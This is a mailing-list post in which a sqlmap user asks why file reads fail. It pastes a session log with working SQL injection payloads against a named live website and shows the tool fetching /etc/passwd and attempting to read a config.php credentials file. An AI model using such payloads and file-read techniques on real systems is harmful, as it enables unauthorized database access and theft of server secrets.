[sqlmap-users] sqlmap --file-read error

Sat, 16 Jun 2012 01:51:35 -0700 

Hi all ,

i use file-read to retrieve file on server .

/etc/passwd can workable

but others response is as followed .

16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
[16:44:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) 
requests:
---
Place: GET
Parameter: su_sd
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650

    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL, 
CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL, 
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&pe=650
---

[16:44:16] [INFO] the back-end DBMS is MySQL
[16:44:16] [INFO] fetching banner
web server operating system: Linux Fedora 15 (Lovelock)
web application technology: PHP 5.3.8, Apache 2.2.17
back-end DBMS: MySQL 5
banner:    '5.1.60'

[16:44:16] [INFO] fingerprinting the back-end DBMS operating system
[16:44:16] [INFO] the back-end DBMS operating system is Linux
[16:44:16] [INFO] fetching file: '/var/www/config.php'
[16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length 
hexadecimal string which it is not able to convert to raw string
/var/www/config.php file saved to:    
'/pentest/database/sqlmap/output/www.kangyang.com.tw/files/_var_www_config.php'

[16:44:16] [INFO] fetched data logged to text files under 
'/pentest/database/sqlmap/output/www.kangyang.com.tw'

[*] shutting down at 16:44:16
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to